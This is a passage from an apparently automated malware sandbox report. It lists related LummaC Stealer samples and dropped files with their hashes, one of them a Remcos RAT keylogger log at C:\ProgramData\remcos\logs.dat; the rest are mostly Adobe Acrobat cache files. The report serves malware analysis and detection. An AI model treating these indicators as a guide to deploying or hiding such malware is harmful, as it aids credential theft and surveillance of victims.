                                                        installer_1.05_36.8.exeGet hashmaliciousLummaCBrowse
                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                            DansMinistrie.exeGet hashmaliciousLummaCBrowse
                                                              installer_1.05_36.7.exeGet hashmaliciousLummaC StealerBrowse
                                                                Set-up.exeGet hashmaliciousLummaC StealerBrowse

                                                                  Created / dropped Files

                                                                  C:\ProgramData\remcos\logs.dat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):144
                                                                  Entropy (8bit):3.369034834541982
                                                                  Encrypted:false
                                                                  SSDEEP:3:rglswkfOl07QDl5JWRal2Jl+7R0DAlBG45klovDl6v:MlsBGlp5YcIeeDAlOWAv
                                                                  MD5:317AA7999F49B0C4FD23D4CBC2A51787
                                                                  SHA1:9B7097868D6D1C2C36FB25FE62817AE276458089
                                                                  SHA-256:F1F95B1FB5162A94C43E8F48D6CF145D34B7F6C51A6A1CBC96F94D4F77B9294D
                                                                  SHA-512:1A78AB79C1B7468336842BE08EE2A11F6915552A97AA2FB547315794B778FF1DFEA0A7AEE0D986D7C0F7003EC79EE4DEF816485C964C29B26E28DD1C2077636B
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                  Preview:....[.2.0.2.5./.0.1./.0.7. .1.2.:.1.3.:.5.3. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):292
                                                                  Entropy (8bit):5.135878529345168
                                                                  Encrypted:false
                                                                  SSDEEP:6:iOp+GNFIq2Pwkn2nKuAl9OmbnIFUtL+nBZZmwl+nBzkwOwkn2nKuAl9OmbjLJ:7pnOvYfHAahFUtL6Z/l6z5JfHAaSJ
                                                                  MD5:2FECE4A43C34C4E34455DD4C46B71AB5
                                                                  SHA1:18377F15D4153855AD7366D9B9E77E1DF49DE432
                                                                  SHA-256:29852B5BC71E3BA69C5E95F0E3054730198845EB9C28F0DE90BF0FA8FDD91CEC
                                                                  SHA-512:205C2602815043AE0E8D18524A3C1442F0366E998D1D85397EA5F8E3D1AA48E3B55E6C9DA6791DFCB7C7FB2E28BD9A0FCB07EBECF2E47DEE5765F95F84D213E9
                                                                  Malicious:false
                                                                  Preview:2025/01/07-12:13:01.978 1e20 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/07-12:13:01.991 1e20 Recovering log #3.2025/01/07-12:13:01.991 1e20 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):292
                                                                  Entropy (8bit):5.135878529345168
                                                                  Encrypted:false
                                                                  SSDEEP:6:iOp+GNFIq2Pwkn2nKuAl9OmbnIFUtL+nBZZmwl+nBzkwOwkn2nKuAl9OmbjLJ:7pnOvYfHAahFUtL6Z/l6z5JfHAaSJ
                                                                  MD5:2FECE4A43C34C4E34455DD4C46B71AB5
                                                                  SHA1:18377F15D4153855AD7366D9B9E77E1DF49DE432
                                                                  SHA-256:29852B5BC71E3BA69C5E95F0E3054730198845EB9C28F0DE90BF0FA8FDD91CEC
                                                                  SHA-512:205C2602815043AE0E8D18524A3C1442F0366E998D1D85397EA5F8E3D1AA48E3B55E6C9DA6791DFCB7C7FB2E28BD9A0FCB07EBECF2E47DEE5765F95F84D213E9
                                                                  Malicious:false
                                                                  Preview:2025/01/07-12:13:01.978 1e20 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/07-12:13:01.991 1e20 Recovering log #3.2025/01/07-12:13:01.991 1e20 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):336
                                                                  Entropy (8bit):5.119275652554515
                                                                  Encrypted:false
                                                                  SSDEEP:6:iOp+XCQjL+q2Pwkn2nKuAl9Ombzo2jMGIFUtL+XEuAIz1Zmwl+XODLVkwOwkn2ng:7poCQOvYfHAa8uFUtLo1Ai1/loc5JfHA
                                                                  MD5:1A70A169BAF7020C6ED937E2BD678BA3
                                                                  SHA1:6478782554CCD5DB258EF0C4B75502599D6E9063
                                                                  SHA-256:A191A3FC31A43C94ADE459CFEBE5885BC4DC36BFD62269543ABAE6D3BD146567
                                                                  SHA-512:19B4AE0B7D7105DA347F217B9271BD1E5CAA76254A976FF9A8EBF0919A410013E7A6067A00EA0902B590A0F4E8E02643DA647880BC7372E4F04AB5138217A445
                                                                  Malicious:false
                                                                  Preview:2025/01/07-12:13:02.223 1ee8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/07-12:13:02.225 1ee8 Recovering log #3.2025/01/07-12:13:02.226 1ee8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):336
                                                                  Entropy (8bit):5.119275652554515
                                                                  Encrypted:false
                                                                  SSDEEP:6:iOp+XCQjL+q2Pwkn2nKuAl9Ombzo2jMGIFUtL+XEuAIz1Zmwl+XODLVkwOwkn2ng:7poCQOvYfHAa8uFUtLo1Ai1/loc5JfHA
                                                                  MD5:1A70A169BAF7020C6ED937E2BD678BA3
                                                                  SHA1:6478782554CCD5DB258EF0C4B75502599D6E9063
                                                                  SHA-256:A191A3FC31A43C94ADE459CFEBE5885BC4DC36BFD62269543ABAE6D3BD146567
                                                                  SHA-512:19B4AE0B7D7105DA347F217B9271BD1E5CAA76254A976FF9A8EBF0919A410013E7A6067A00EA0902B590A0F4E8E02643DA647880BC7372E4F04AB5138217A445
                                                                  Malicious:false
                                                                  Preview:2025/01/07-12:13:02.223 1ee8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/07-12:13:02.225 1ee8 Recovering log #3.2025/01/07-12:13:02.226 1ee8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\5dadce47-595a-4dda-a983-bec9c45c54ff.tmp

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:JSON data
                                                                  Category:modified
                                                                  Size (bytes):475
                                                                  Entropy (8bit):4.961305759039287
                                                                  Encrypted:false
                                                                  SSDEEP:12:YH/um3RA8sq1sBdOg2Hzy2caq3QYiubInP7E4T3y:Y2sRds7dMHGJ3QYhbG7nby
                                                                  MD5:870ACE152125C2734E1DABEA6598134F
                                                                  SHA1:C00F7A2C562C1BE2AD1D25D7C9BE816740CBB61E
                                                                  SHA-256:0E96B514F3B1803598FF0EA8B9F6FA8A9BE1F1C99AA2005B97B5DEFFF1FC7E0B
                                                                  SHA-512:E93634F1DC16E9AFD7E14DC8FCFFF4AD91213464F03A2CAB3F2D950127459DBF00B58957AFC4386BF1B616BE565E422AE473070A8E247B5F5D94A121248DD9C0
                                                                  Malicious:false
                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380829994454653","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":139190},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):475
                                                                  Entropy (8bit):4.961305759039287
                                                                  Encrypted:false
                                                                  SSDEEP:12:YH/um3RA8sq1sBdOg2Hzy2caq3QYiubInP7E4T3y:Y2sRds7dMHGJ3QYhbG7nby
                                                                  MD5:870ACE152125C2734E1DABEA6598134F
                                                                  SHA1:C00F7A2C562C1BE2AD1D25D7C9BE816740CBB61E
                                                                  SHA-256:0E96B514F3B1803598FF0EA8B9F6FA8A9BE1F1C99AA2005B97B5DEFFF1FC7E0B
                                                                  SHA-512:E93634F1DC16E9AFD7E14DC8FCFFF4AD91213464F03A2CAB3F2D950127459DBF00B58957AFC4386BF1B616BE565E422AE473070A8E247B5F5D94A121248DD9C0
                                                                  Malicious:false
                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380829994454653","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":139190},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):4320
                                                                  Entropy (8bit):5.257683398150361
                                                                  Encrypted:false
                                                                  SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo78PnNV8:etJCV4FiN/jTN/2r8Mta02fEhgO73go3
                                                                  MD5:FC7FA10805554558365CED728C5953A5
                                                                  SHA1:00F1183BB81179991E8999F620DE4B3F10765BEC
                                                                  SHA-256:FBFCF80CEC43B66BACAB7772C755B9ACEFDE3420D78E5E4D39EE2A4F14E2CB78
                                                                  SHA-512:5D0A963F87A1860E3030EC96ADD465D54A1E579728003FA54C7E094C4D4ABF8207EF10D4DEF1EF8B9A319E42E02C2437CDA51A2ED07E7820437EEA19A6BA5426
                                                                  Malicious:false
                                                                  Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):324
                                                                  Entropy (8bit):5.16138107375685
                                                                  Encrypted:false
                                                                  SSDEEP:6:iOp+X+QFlL+q2Pwkn2nKuAl9OmbzNMxIFUtL+XdHz1Zmwl+XK2LVkwOwkn2nKuAo:7po/OvYfHAa8jFUtLodT1/loKi5JfHAo
                                                                  MD5:945CFF6CA0F48CD112A3D6F370DFB79D
                                                                  SHA1:69C185887F0FB61A451300A329185D76A28C79A6
                                                                  SHA-256:C752622FE48176E0B6490B3D183DCF198A9BC2BC8775F7F0F27E8A5B5009C959
                                                                  SHA-512:AEE153C1589F5B103D17375394C0E8A3721BF43C12B3A11CFDE0431452CEAB7DFF5ACA63A66AB5880275211B9527D6724CCBACE4F5674C8BF14E2A48D3010CC8
                                                                  Malicious:false
                                                                  Preview:2025/01/07-12:13:02.887 1ee8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/07-12:13:02.915 1ee8 Recovering log #3.2025/01/07-12:13:02.924 1ee8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):324
                                                                  Entropy (8bit):5.16138107375685
                                                                  Encrypted:false
                                                                  SSDEEP:6:iOp+X+QFlL+q2Pwkn2nKuAl9OmbzNMxIFUtL+XdHz1Zmwl+XK2LVkwOwkn2nKuAo:7po/OvYfHAa8jFUtLodT1/loKi5JfHAo
                                                                  MD5:945CFF6CA0F48CD112A3D6F370DFB79D
                                                                  SHA1:69C185887F0FB61A451300A329185D76A28C79A6
                                                                  SHA-256:C752622FE48176E0B6490B3D183DCF198A9BC2BC8775F7F0F27E8A5B5009C959
                                                                  SHA-512:AEE153C1589F5B103D17375394C0E8A3721BF43C12B3A11CFDE0431452CEAB7DFF5ACA63A66AB5880275211B9527D6724CCBACE4F5674C8BF14E2A48D3010CC8
                                                                  Malicious:false
                                                                  Preview:2025/01/07-12:13:02.887 1ee8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/07-12:13:02.915 1ee8 Recovering log #3.2025/01/07-12:13:02.924 1ee8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                  C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-250107171306Z-175.bmp

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:PC bitmap, Windows 3.x format, 110 x -152 x 32, cbSize 66934, bits offset 54
                                                                  Category:dropped
                                                                  Size (bytes):66934
                                                                  Entropy (8bit):1.7544134515160215
                                                                  Encrypted:false
                                                                  SSDEEP:192:8iRvM0C0BLs5q/z4molmRy8OazjL+ZdTkdAw888888H+88838Sak888888H+888x:8iRLfG2gazjL+3TkdApSsWkvXQV
                                                                  MD5:A61E2E877B9BEBF90983EE1455F6C731
                                                                  SHA1:C0C641D144A7D5BA73C505EBE6EA34D92EF2335F
                                                                  SHA-256:FB3D9E842D9E3703AEE31D85DB37A454460C35575955661DF1961DAE53089D44
                                                                  SHA-512:B3B9B8924D74208FD40AE031886AA4C87158CCE498B5FCC0925C87E7D42543A9B7E0560229319A024424B3D73D5723E631113D310DE09CF0D28E68966044B1C1
                                                                  Malicious:false
                                                                  Preview:BMv.......6...(...n...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                                  Category:dropped
                                                                  Size (bytes):86016
                                                                  Entropy (8bit):4.44478430438147
                                                                  Encrypted:false
                                                                  SSDEEP:384:yezci5tuiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:rBs3OazzU89UTTgUL
                                                                  MD5:DFE515C0EB39A9DD00DF4866A443ADCB
                                                                  SHA1:740D8EF18F30BB253A3E11C4BB650C250FE721EA
                                                                  SHA-256:18E4F3C1510ABC67E482F3FE8673E13053CC75857747DB6F504E7979736F41E0
                                                                  SHA-512:75F82BDBFA59F6BF0067C617D73CD4DF23E4456CCC8BD8D9D9650AFB1DBF97597DFAC8421724500A3F3269E6BB68C59E78F979323CECDC3C9710C9E54BF201ED
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:SQLite Rollback Journal
                                                                  Category:dropped
                                                                  Size (bytes):8720
                                                                  Entropy (8bit):3.7727105304855
                                                                  Encrypted:false
                                                                  SSDEEP:48:7MVp/E2ioyVbioy9oWoy1Cwoy1PKOioy1noy1AYoy1Wioy1hioybioyboy1noy12:7ipjubFSXKQiZb9IVXEBodRBkc
                                                                  MD5:568AF3B61912297C17EAE65ED6972EAA
                                                                  SHA1:E6BEC052DA0C02A42331CF996DAA68DA345C202D
                                                                  SHA-256:C60B4D5B941F40F04DD140133C814AA9B528722DD696F499CF48CBCD75F754C9
                                                                  SHA-512:F53FCEA7937D6DEAAE82E6CD2DBC6920E7EC98BE050F697D16D252D170886B556C7970A5A4E54EB5599E43741AAAD8D61A7D6772FA2209094FCCB6D0461AFB50
                                                                  Malicious:false
                                                                  Preview:.... .c.....,.u}...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:Certificate, Version=3
                                                                  Category:dropped
                                                                  Size (bytes):1391
                                                                  Entropy (8bit):7.705940075877404
                                                                  Encrypted:false
                                                                  SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                  MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                  SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                  SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                  SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                  Malicious:false
                                                                  Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                  Category:dropped
                                                                  Size (bytes):71954
                                                                  Entropy (8bit):7.996617769952133
                                                                  Encrypted:true
                                                                  SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                  MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                  SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                  SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                  SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                  Malicious:false
                                                                  Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):192
                                                                  Entropy (8bit):2.752969867432539
                                                                  Encrypted:false
                                                                  SSDEEP:3:kkFklV2GfllXlE/HT8k8HlrtNNX8RolJuRdxLlGB9lQRYwpDdt:kK3XT8HNMa8RdWBwRd
                                                                  MD5:C3A798BA28BC12D83EB6965FEBB011A4
                                                                  SHA1:4955C7B76F9D1B3FFF92DA3F2177E31B6920B4DD
                                                                  SHA-256:0233221A43036B59A9F1D3CE899BF3779974FE187B278D06E2589E419926D356
                                                                  SHA-512:9F89DE1CF4BF8345C74961B5AC2E5EA0DEBA2B88170465D6EBA58BEEDA45935C13DF4AF61BD7CAF5C5A42AD745C52E07013768E06A65B9C4F5C91B2779729424
                                                                  Malicious:false
                                                                  Preview:p...... ...........p'a..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:data
                                                                  Category:modified
                                                                  Size (bytes):328
                                                                  Entropy (8bit):3.2340889495313987
                                                                  Encrypted:false
                                                                  SSDEEP:6:kKty9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:VtDImsLNkPlE99SNxAhUe/3
                                                                  MD5:F2998A022F98D9D9DD6633209970DCA0
                                                                  SHA1:48016D3F1A6E8211C3B4B73A74E374EF2E69ED15
                                                                  SHA-256:C0B8F0021EECE1C1A28B6BBA6689738834BD36CF2A39C1361D0FDF03F3634347
                                                                  SHA-512:8BA3B7BCBFA4477F5A626D8BD9F6938F9453B9408402FCFA52F2A82F909E2D32627E018CD6E2B6FF5B240EE118705D13261B179D2396999147A89F7AD6F9B3AF
                                                                  Malicious:false
                                                                  Preview:p...... .........._.'a..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:PostScript document text
                                                                  Category:dropped
                                                                  Size (bytes):1233
                                                                  Entropy (8bit):5.233980037532449
                                                                  Encrypted:false
                                                                  SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                  MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                  SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                  SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                  SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                  Malicious:false
                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7524

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:PostScript document text
                                                                  Category:dropped
                                                                  Size (bytes):1233
                                                                  Entropy (8bit):5.233980037532449
                                                                  Encrypted:false
                                                                  SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                  MD5:8BA9D8BEBA42C23A5DB405994B54903F
